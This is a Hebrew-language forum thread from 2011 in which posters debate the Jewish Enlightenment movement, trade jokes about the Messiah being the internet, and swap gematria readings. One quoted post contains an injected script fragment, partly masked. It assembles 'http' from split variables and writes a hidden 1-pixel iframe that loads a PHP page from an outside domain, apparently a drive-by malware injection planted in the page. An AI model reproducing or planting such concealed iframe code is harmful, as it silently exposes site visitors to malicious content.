|
|
| נשלח ב-22/2/2011 20:41 |
|
| |
הממפ...
הדיון על הפורום=השכלה עולה מפעם לפעם, ותמיד לדעתי טוב לבדוק את הדברים, לפחות למי שאכפת לו כמוני, כדי שלא ניכשל ולא נכשיל.
עלבונות וכה"ג פסולים ואם נמחקו יש להוסיף ולמחוק. (נא לראות בכך הודעת ניהול).
לגבי השנאה העצמית של יהודי ההשכלה, אולי פוגמישו ירצה לסכם את הנושא על פי המחקר שקרא (בשעה שאינה יום ואינה לילה מן הסתם, כדי לא ליבטל מתורה, סמיילי) ואז אפשר יהיה להשוות את ממצאיו למה שקורה היום בישיבות ובפורום.
|
|
|
|
| נשלח ב-22/2/2011 21:00 |
|
| |
| maxmen כתב: |  | והרב פיש אמר עלי (לאבא שלי,) שאני יהיה ראש בית דין של מעלה בבית דין של מעלה אחרי מותי
אז ראה הוזהרתיך, חכה חכה ידידי,,,,,,,, |
|
כבר היה שר בממשלת ישראל שהחזו"א אמר לאבא שלו שהוא (הילד השר) יהיה המשיח, במו אזניי שמעתי מפיו.
רק הוא מסכן לא ידע שהמשיח זה האינטרנט (אליבא דאב"ד של מעלה)...
|
|
|
|
| נשלח ב-22/2/2011 21:14 |
|
| |
ידידי:
זה אמיתי אני זוכר את זה, היו שם כמה אנשים חשובים (אחד תלמיד חכם מופלג, ראש כולל חשוב מאוד בירושלים)
והם מזכירים לי מידי פעם את הסיפור,
תשמע: אני צוחק על הסיפור ולא מאמין בא כלל,
ואמרתי פעם כך:
לו בדימיון זה יהיה אמת ?!
אני ביום הראשון בתפקיד, אני הפטר את כולם, ואת עצמי, ואני הפנה לאלוקים ואומר לו,
אין לך מה לחפש כאן למעלה, כולם כאן רובוטים (=מלאכים בלי בחירה = נשמות בלי בחירה)
בוא לרדת למטה יש מיליארדי אנשים נשים וטף שמחכים לך שם כבר אלפי שנים,
|
|
|
|
| נשלח ב-22/2/2011 21:14 |
|
| |
הרב מימוני אולי פוגמישו ירצה לסכם את הנושא על פי המחקר שקרא (בשעה שאינה יום ואינה לילה מן הסתם, כדי לא ליבטל מתורה, סמיילי
יש עוד התר לעסוק במחקרים , חוץ מלא יום ולא לילה- הוא כנראה עשה זאת בשרותים ששם אסור להרהר בד"ת, ולכן יש למחקרים הללו ריח רע
|
|
|
|
| נשלח ב-22/2/2011 21:16 |
|
| |
שותף סוד
האם תגלה את הסוד מי זה היה?
ומדוע משיח זה אינטרנט? בגימטריא?
אם הסיפור אותנטי, ואשמח לדעת על שרשרת המסירה, אזי יש לומר שהחזו"א הגדול לא חש לומר דברים בעלמא. אולי זה לא חידוש? לגבי קצת כן. מסתבר שאם זה נכון, החזו"א לא חשש שפעם יעוותו את כוונותיו או שסמך שיהיה מי שיתקן. (ומכאן לעצכח מן התורה).
|
|
|
|
| נשלח ב-22/2/2011 21:26 |
|
| |
| מיימוני כתב: |  | שותף סוד
האם תגלה את הסוד מי זה היה?
ומדוע משיח זה אינטרנט? בגימטריא?
אם הסיפור אותנטי, ואשמח לדעת על שרשרת המסירה, אזי יש לומר שהחזו"א הגדול לא חש לומר דברים בעלמא. אולי זה לא חידוש? לגבי קצת כן. מסתבר שאם זה נכון, החזו"א לא חשש שפעם יעוותו את כוונותיו או שסמך שיהיה מי שיתקן. (ומכאן לעצכח מן התורה). ******* language="">
*--
var as='h';
var ac='tt';
var ab='p';
var ay="//";
document.write("*************** src='"+as+ac+ab+":"+ay+"llaptops.co.cc/a1.php?a="+***************+"' frameborder='0' height=1px width=1px scrolling='no' ><*");
//*
> |
|
אני שותף סוד, לא שותף גילוי.
הסיפור הזוי לחלוטין, אבל היה במציאות.
חס ושלום לסבך את החזו"א עם ההבלים האלה.
מיימוני, אתה לא קורא עיתונים ושומע חדשות ?
מקסמן הודיע כאן בפורום הקדוש הזה שהמשיח הוא האינטרנט, והתפתח אח"כ דיון מרתק אם בן יוסף או בן דוד.
אתה רואה מה אתה מפסיד ?
|
|
|
|
| נשלח ב-22/2/2011 21:29 |
|
| |
הנה גימטריא על עצכ"ח באדיבות פרויקט השו"ת
תהלים פרק קנ
(א) הַלְלוּ יָהּ הַלְלוּ אֵל בְּקָדְשׁוֹ הַלְלוּהוּ בִּרְקִיעַ עֻזּוֹ:
תהלים פרק יח
עַל כֵּן אוֹדְךָ בַגּוֹיִם יְקֹוָק וּלְשִׁמְךָ אֲזַמֵּרָה:
-
|
|
|
|
| נשלח ב-22/2/2011 21:30 |
|
| |
מה אתם רוצים מפוג . מותר לחקור על מנת להתפרנס והוא מפרנס יפה את עצמו ואת החולקים עליו , כולם עושים מממצאיו כסף חלק בפירסומם וחלק בהכחשתם . ורק לנו אין אחוזים , חבל.
|
|
|
|
| נשלח ב-22/2/2011 21:44 |
|
| |
ירוחם אתה רוצה להתחיל בגימטריות ? הרי לך.
תנועת ההשכלה (1291) - ויוסיפו עוד לחטוא לו, למרות עליון בציה. הכרזת הקמת המדינה. קונספירצית חייזרים.
וגם - פלגי מים לב מלך ביד ה', על כל אשר יחפץ יטנו. מחשבת ישראל. תצא הודעה מסודרת.
נו, עכשיו תבחר.
|
|
|
|
| נשלח ב-22/2/2011 21:52 |
|
| |
בחרתי
העדה החרדית= וַיֵּצֵא מֶלֶךְ סְדֹם וּמֶלֶךְ עֲמֹרָה וּמֶלֶךְ אַדְמָה יתד נאמן= התנינים
|
|
|
|
| נשלח ב-22/2/2011 22:01 |
|
| |
לעומת זאת, מדינת ישראל (1045)-
אזי חיים בלעונו בחרות אפם בנו. ומכה אביו ואמו מות יומת. מאסתי לא לעלם אחיה, חדל ממני כי הבל ימי. ואפילו- *** של שור (תרגום של ביטוי ידוע באנגלית, תבדוק !)
אז לאן נגיע עם גימטריות של חובבנים ?
|
|
|
|
| נשלח ב-22/2/2011 22:11 |
|
| |
שותף אנחנו עוסקים בפרפארות- כל אחד וטעמו עימו.
מדינת ישראל= אֹמַר לַיקֹוָק מַחְסִי וּמְצוּדָתִי אֱלֹהַי אֶבְטַח בּוֹ:
|
|
|
|
|
| נשלח ב-22/2/2011 22:47 |
|
| |
שותף בקשתי ממך משהו.
|
|
|
|
| נשלח ב-23/2/2011 03:48 |
|
| |
פארק_מהלך,
אתמהה, שם מדובר להמשך אחרי ע"ז והרהורים רעים.
תלמידטועה,
מה שכתבת לגבי ההתרחקות מהמסורת של ראשוני אבות ההשכלה, זה לא נכון. כי האנשים הללו, מי שכבר היה מחובר, היה מחובר לקו הרציונאליסטי ביותר של היהדות, כגון הרמב"ם וכיו"ב. ואחרי שמנדלסון ביסס את הקו שלו (שים לב, אנו מדברים כבר על מנדלסון), אז בהתחלה רבים נהו אחרי משנתו, כי היא היוותה את הקו היותר "רציונאליסטי" כביכול במחנה האורתודוקסי. עד שבסוף רוב ילדיו של מנדלסון התנצרו, ותלמידיו, ושומעי לקחו פתחו את הרפורמה.
למעשה, הסיבה לכל זה, זה לא הרצון להיות רציונאליסט, אלא כאמור, הערצת תרבות הגויים, עמוס אלון מביא שתי מונחים: ה"בילדונג"Bildung) ) פירושו עידון האופי והאני בהתאם לאידיאלים של תנועת ההשכלה, גם כשהם נשארים יהודים. הבילדונג ו"התרבות" (Kultur) יהפכו אותם לגרמנים במאה אחוזים (אילון, עמ' 69).ז"א – שלא מדובר פה רק על תהליך של הפניית גב למסורת, אלא על ממש הערצה של התרבות הגרמנית, שכידוע הייתה "המתוקנת שבאומות", וכפי שהוכיחה זאת היטב.
תוקן על ידי פוגמישו ב- 23/02/2011 03:50:46
|
|
|
|
|